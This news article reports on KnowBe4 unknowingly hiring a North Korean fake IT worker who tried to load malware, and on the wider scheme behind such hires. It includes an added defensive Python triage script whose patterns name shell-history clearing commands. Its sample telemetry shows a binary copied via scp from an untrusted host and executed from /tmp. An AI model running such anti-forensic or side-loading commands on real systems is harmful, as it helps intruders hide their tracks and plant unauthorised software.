KnowBe4 faced malware threat after unknowingly hiring North Korean hacker

FLORIDA, UNITED STATES — KnowBe4, a prominent security awareness training company, revealed in July 2024 that it had unknowingly hired a North Korean hacker as a software engineer. The hacker attempted to load malware onto the company's network as soon as the work-issued laptop arrived.
This incident, detailed by CEO Stu Sjouwerman in a blog post, serves as a cautionary tale for businesses worldwide.
Deceptive hiring process
The hacker, posing as a software engineer, used a stolen U.S. identity and an AI-enhanced photo to pass KnowBe4’s rigorous hiring process. This included multiple rounds of video interviews and thorough background checks.
“First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems,” Sjouwerman assured in his post.
“This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don’t let it happen to you.”
Immediate detection and response
The incident was discovered on July 15, 2024, when KnowBe4's Security Operations Center (SOC) detected suspicious activity from the new hire's workstation. The SOC team contacted the new hire, who claimed to be troubleshooting a router issue.
Further investigation showed that the new hire was tampering with shell session history files, transferring potentially harmful files onto the workstation, and executing unauthorized software, with a Raspberry Pi used to download it.
KnowBe4’s SOC team promptly contained the compromised device and shared their findings with cybersecurity firm Mandiant and the Federal Bureau of Investigation (FBI). “We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea,” Sjouwerman wrote.
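The activity the SOC flagged, session history tampering, file transfers from an unexpected source and execution of unrecognized binaries on a brand-new hire's laptop, is the kind of pattern that can be triaged mechanically. The Python below is an added example written for this article; it is not KnowBe4's or Mandiant's detection logic. The EDR-style event records, their field names, the trusted-source allowlist and the 30-day onboarding window are all constructed assumptions.

```python
"""Triage rules for suspicious new-hire endpoint activity.

Added example for this article, not KnowBe4's or Mandiant's tooling. The
telemetry records, field names, trusted sources and onboarding window below
are constructed assumptions.
"""
import ipaddress
import re
from datetime import date

# Assumed: hosts/networks a corporate laptop may legitimately pull files from.
TRUSTED_SOURCES = {"artifacts.corp.example"}
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]
# Assumed: new hires sit in a restricted tier for their first 30 days.
ONBOARDING_DAYS = 30

HISTORY_TAMPER = re.compile(
    r"history\s+-c\b|unset\s+HISTFILE\b|HISTFILE=/dev/null|HISTSIZE=0"
    r"|ln\s+-sf?\s+/dev/null\s+\S*history", re.I)
HISTORY_FILE = re.compile(r"/\.(?:bash|zsh|sh)_history$")
TRANSFER_TOOL = re.compile(r"^\s*(?:sudo\s+)?(?:scp|sftp|rsync|curl|wget)\b")
HOST_TOKEN = re.compile(
    r"(?:\w+@)?((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
STAGING_EXEC = re.compile(r"^(?:/tmp|/var/tmp|/dev/shm|/home/[^/]+/Downloads)/")

WEIGHTS = {"history_tamper": 3, "history_truncated": 3,
           "transfer_from_untrusted_host": 2, "exec_from_staging_dir": 2}

# Constructed EDR-style telemetry for one workstation (hypothetical user jdoe).
EVENTS = [
    {"ts": "2024-07-15T21:10:04Z", "user": "jdoe", "type": "process",
     "cmd": "bash -c 'history -c; unset HISTFILE'"},
    {"ts": "2024-07-15T21:11:30Z", "user": "jdoe", "type": "file_write",
     "path": "/home/jdoe/.bash_history", "size": 0},
    {"ts": "2024-07-15T21:12:02Z", "user": "jdoe", "type": "process",
     "cmd": "scp pi@192.168.1.44:/srv/tools/agent /tmp/agent"},
    {"ts": "2024-07-15T21:12:40Z", "user": "jdoe", "type": "process",
     "cmd": "/tmp/agent --daemon"},
    {"ts": "2024-07-15T21:13:10Z", "user": "jdoe", "type": "process",
     "cmd": "git status"},
]


def is_trusted(src):
    """True if a transfer source is an allowlisted host or inside a trusted net."""
    if src in TRUSTED_SOURCES:
        return True
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False  # hostname that is not on the allowlist
    return any(ip in net for net in TRUSTED_NETS)


def classify(ev):
    """Return (rule, detail) for a suspicious event, else (None, None)."""
    if ev["type"] == "process":
        cmd = ev["cmd"]
        if HISTORY_TAMPER.search(cmd):
            return "history_tamper", cmd
        if STAGING_EXEC.match(cmd):
            return "exec_from_staging_dir", cmd
        if TRANSFER_TOOL.match(cmd):
            # Pull every host-looking token out of the command and check each.
            for src in HOST_TOKEN.findall(cmd):
                if not is_trusted(src):
                    return "transfer_from_untrusted_host", src
    elif ev["type"] == "file_write":
        if HISTORY_FILE.search(ev["path"]) and ev.get("size") == 0:
            return "history_truncated", ev["path"]
    return None, None


def triage(events, hire_dates, today):
    """Tag each suspicious event with its rule and whether the user is new."""
    findings = []
    for ev in events:
        rule, detail = classify(ev)
        if rule is None:
            continue
        hired = hire_dates.get(ev["user"])
        new_hire = hired is not None and (today - hired).days <= ONBOARDING_DAYS
        findings.append({"ts": ev["ts"], "user": ev["user"], "rule": rule,
                         "detail": detail, "new_hire": new_hire})
    return findings


def risk_score(findings):
    """Sum the rule weights; double the total when the actor is still onboarding,
    since a fresh hire has no legitimate reason to clear history or side-load tools."""
    score = sum(WEIGHTS[f["rule"]] for f in findings)
    return score * 2 if any(f["new_hire"] for f in findings) else score


def demo():
    """Run the rules over the constructed telemetry; returns (findings, score)."""
    findings = triage(EVENTS, {"jdoe": date(2024, 7, 12)}, date(2024, 7, 15))
    return findings, risk_score(findings)


if __name__ == "__main__":
    findings, score = demo()
    for f in findings:
        print(f["ts"], f["user"], f["rule"], f["detail"])
    print("risk score:", score)
```

The point of the onboarding multiplier is the one Sjouwerman makes about new hires starting in a restricted area: the same evidence means more when the account has been live for three days than for three years, so the score escalates instead of relying on an analyst to notice the hire date.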
Warning against North Korea’s IT worker scheme
In 2023, the FBI advised U.S. employers to exercise caution when hiring remote IT workers, after uncovering a scheme in which North Korean IT workers infiltrated American companies under fake identities.
Authorities estimated that hundreds of IT workers were involved, secretly sending millions of dollars in wages back to North Korea to fund its weapons programs. They interviewed over video chat and obtained remote jobs with U.S. companies under false names, often paying Americans to let them use their home internet connections so that their traffic appeared to originate in the U.S.
In May 2024, federal authorities arrested two individuals in connection with a scheme that enabled North Korean IT workers to secure remote positions at more than 300 U.S. companies using stolen identities. The scheme compromised the identities of more than 60 U.S. citizens and generated at least $6.8 million in revenue for the North Korean government, which was funneled back to support its weapons programs.
Lessons learned and future precautions
The incident shows how far identity fraud in hiring has advanced and why identity verification has to be treated as a security control rather than an HR formality. KnowBe4 is strengthening its hiring process with more thorough identity validation and is training staff to recognize red flags.
“If it can happen to us, it can happen to almost anyone,” Sjouwerman emphasized. “It’s good we have new employees in a highly restricted area when they start, and have no access to production systems. Our controls caught it, but that was sure a learning moment that I am happy to share with everyone.”
The case also shows the value of continuous endpoint monitoring, least-privilege access for new hires, and close coordination between HR, IT, and security teams against state-backed threat actors.
As remote work becomes more prevalent, companies must verify that their hires are who they claim to be, and build their onboarding so that a fraudulent hire is contained before it reaches production systems.